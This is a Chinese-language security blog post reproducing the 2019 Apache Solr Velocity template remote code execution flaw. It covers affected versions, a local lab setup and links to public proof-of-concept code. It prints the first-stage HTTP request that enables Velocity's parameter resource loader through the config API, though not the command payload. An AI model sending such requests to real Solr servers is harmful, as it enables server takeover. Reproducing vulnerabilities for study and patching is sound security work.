Apache Solr Velocity模板远程代码执行漏洞复现

  • A+
所属分类:安全文章

Apache Solr Velocity模板远程代码执行漏洞复现

2019年10月31日,飓风安全应急响应中心监测到国外安全研究人员披露了Apache Solr Velocity模版注入远程命令执行漏洞。攻击者通过构造特定的请求,成功利用该漏洞可直接获取服务器权限。


漏洞描述

Solr中存在VelocityResponseWriter组件,攻击者可以构造特定请求修改相关配置,使VelocityResponseWriter组件允许加载指定模板,进而导致Velocity模版注入远程命令执行漏洞,攻击者利用该漏洞可以直接获取到服务器权限。飓风安全响应中心提醒Solr用户尽快采取安全措施阻止漏洞攻击。


影响版本

Apache Solr 5.x - 8.2.0,存在config API版本


安全建议

目前Apache Solr官方未发布该漏洞的补丁,请关注Solr官方以便获取更新信息:https://lucene.apache.org/solr/


漏洞复现过程:

1)首先 下载Solr的环境

https://www.apache.org/dyn/closer.lua/lucene/solr/8.2.0/solr-8.2.0.zip

poc所在地

https : //gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt

https://github.com/wyzxxz/Apache_Solr_RCE_via_Velocity_template

2)解压并执行 

solr.cmd start

Apache Solr Velocity模板远程代码执行漏洞复现

然后访问http:ip:8983

Apache Solr Velocity模板远程代码执行漏洞复现


3)然后利用公布的poc修改向config发送json配置继续修改

POST /solr/test/config HTTP/1.1
Host: solr:8983
Content-Type: application/json
Content-Length: 259

{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}

Apache Solr Velocity模板远程代码执行漏洞复现

Apache Solr Velocity模板远程代码执行漏洞复现


本文始发于微信公众号(飓风网络安全):Apache Solr Velocity模板远程代码执行漏洞复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: